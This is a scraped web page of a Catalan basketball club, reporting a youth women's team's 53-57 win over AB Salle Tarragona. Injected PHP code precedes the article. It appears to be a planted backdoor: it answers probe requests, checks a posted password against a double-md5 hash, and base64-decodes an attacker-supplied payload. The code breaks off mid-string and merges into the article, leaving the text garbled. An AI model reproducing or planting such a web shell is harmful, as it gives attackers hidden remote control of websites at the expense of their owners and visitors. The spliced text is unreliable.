function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 B demostra que és un equip molt millorat i derrota l'AB Salle Tarragona (53-57) - Tgn Bàsquet Club -

El cadet femení 04 B demostra que és un equip molt millorat i derrota l’AB Salle Tarragona (53-57)

Updated: febrer 12, 2019

El cadet femení 04 B és un equip nou. La feina des que va començar la temporada s’evidencia ara en forma de victòries, recollint el fruit als esforços de molts mesos. L’equip que entrena Adrià Adam va vèncer a la pista de l’AB Salle Tarragona, un rival que en la primera fase havia derrotat a les tarragonines per 24 i 18 punts de diferència.

Així, la bona defensa visitant va ser capaç de marcar un parcial de 0-17 en el segon període, deixant un marcador de 14-31 en el minut 18. La Salle, però, no va abaixar els braços i va anar retallant diferències fins a capgirar el resultant, dominant per cinc punts de diferència a sis minuts del final. Adam, però, va demanar temps mort i va servir per reorganitzar el seu equip, que va tornar a la pista amb més energia i fent un parcial de 0-10 que li va servir per endur-se el triomf.